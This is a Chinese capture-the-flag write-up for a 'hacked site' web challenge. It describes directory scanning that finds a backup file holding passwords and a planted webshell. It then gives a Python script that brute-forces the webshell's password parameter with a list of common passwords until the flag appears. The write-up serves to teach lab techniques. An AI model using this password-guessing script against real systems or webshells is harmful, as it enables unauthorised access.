Polar Web 【简单】- 被黑掉的站

Polar Web 【简单】- 被黑掉的站

Contents

  • Polar Web 【简单】- 被黑掉的站
    • 思路
    • EXP
    • 运行&总结

思路

如题目所述,这是一个被黑掉的站点,由此不禁要了解该黑客发现了哪些可以入手的路径,或是留下了什么样的文件供持续访问。

  1. 目录扫描该站点发现:index.php.bakshell.php 两个文件 —— 先后发现是密码列表及shell连接点。
  2. 为了方便对获得的密码逐个尝试,本次采用了python脚本来代劳。
  3. 运行脚本发现其中一个可用的密码,并得到目标flag。

bak
shell

EXP

from requests import post

candidate = '123456 123456789 123123 111111 anhyeuem 1234567 123456789 123456 12345678 000000 asdasd 25251325 1234567890 121212 123321 zxcvbnm qweqwe 456789 112233 aaaaaa 123123123 987654321 11111111 qwerty 147258369 maiyeuem 123qwe 654321 iloveyou 123654 999999 qqqqqq 1111111 147258 hota407 anhtuan 222222 159753 11223344 anhnhoem anh123 159357 qwertyuiop asd123 987654321 emyeuanh mmmmmm 12345 666666 anhanh 123789 phuong 111222 qweasd hanoiyeudau nguyen 789456 1111111111 mylove 789456123 19001560 qwe123 asdfghjkl pppppp anhhung 1234560 abc123 maiyeu 123456a zzzzzz quangninh 987654 555555 tuananh asasas asdfgh zxcvbn 321321 tinhyeu 147852369 456123 matkhau 147852 12345678910 thienthan nikel anhyeu 111111111 toilatoi 10cham0 147258369 456456 khongbiet 789789 a123456 333333 888888 123654789 truong maimaiyeuem hhhhhh'
candidate = candidate.split(' ')

for pwd in candidate:
    data = {
        "pass": f'{pwd}',
    }
    res = post('http://~.www.polarctf.com:8090/shell.php', data=data)
    res = str(res.content.decode('utf8'))
    if '不是自己的马不要乱骑' not in res:
        print(res[res.index('flag'):])

运行&总结

run

  • 本题旨在记录针对已攻陷站点的基本思路,以及密码爆破脚本的编写思路。







敬,不完美的明天
上一篇:初识C语言第三十天——设计三子棋游戏


下一篇:基于RNN和Transformer的词级语言建模 代码分析 数据集的处理 Dictionary 和 Corpus